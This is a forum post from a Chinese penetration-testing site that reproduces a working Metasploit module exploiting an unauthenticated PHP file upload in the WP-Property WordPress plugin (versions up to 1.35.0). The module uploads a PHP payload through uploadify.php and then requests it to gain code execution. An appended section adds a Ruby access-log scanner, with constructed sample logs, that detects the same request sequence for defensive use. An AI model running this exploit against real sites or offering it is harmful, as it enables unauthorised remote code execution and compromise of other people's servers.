中国网络渗透测试联盟

Title: WordPress WP-Property PHP File Upload Vulnerability

Author: admin    Time: 2013-1-4 19:51

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this code is or how to use it. I mean msf.
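
An added example, not part of the original post or of the Metasploit module: a log check that flags the request sequence the module produces (GET probe of uploadify.php, unauthenticated POST to it, then a request for a PHP file in the same directory). It assumes Apache/nginx combined-format access logs; the function names and the sample log lines are constructed for illustration.

```ruby
# Added example: detect the WP-Property uploadify request pattern in access logs.
# Assumption: combined log format. Paths are matched as logged (no URL decoding).
UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/}i
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Classify one request against the plugin's uploadify directory.
def classify(method, path, status)
  path = path.split('?', 2).first.to_s
  return nil unless path =~ UPLOADIFY_DIR
  file = path.split('/').last.to_s
  if file.casecmp('uploadify.php').zero?
    return :upload if method == 'POST' && status == 200
    return :probe  if method == 'GET'
  elsif file =~ /\.(php\d?|phtml|phar)\z/i
    # No script other than uploadify.php should be requested from here.
    return :exec_of_uploaded_file
  end
  nil
end

# Walk the log in order; an execution request from a client that already
# uploaded successfully is rated :high, everything else :review.
def scan(lines)
  uploaders = {}
  findings = []
  lines.each do |line|
    m = LOG_LINE.match(line) or next
    kind = classify(m[:method], m[:path], m[:status].to_i) or next
    uploaders[m[:ip]] = true if kind == :upload
    high = kind == :exec_of_uploaded_file && uploaders[m[:ip]]
    findings << { ip: m[:ip], ts: m[:ts], kind: kind, path: m[:path],
                  severity: high ? :high : :review }
  end
  findings
end

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE = <<~LOG.lines
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/abcde.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.9 - - [04/Jan/2013:19:41:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 512 "-" "-"
  198.51.100.9 - - [04/Jan/2013:19:41:05 +0800] "GET /wordpress/index.php HTTP/1.1" 200 4096 "-" "-"
LOG

scan(SAMPLE).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

Because the module builds its payload with `:unlink_self=>true`, the uploaded file may no longer be on disk after it runs, so the access log is often the main evidence on hosts running WP-Property <= 1.35.0.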
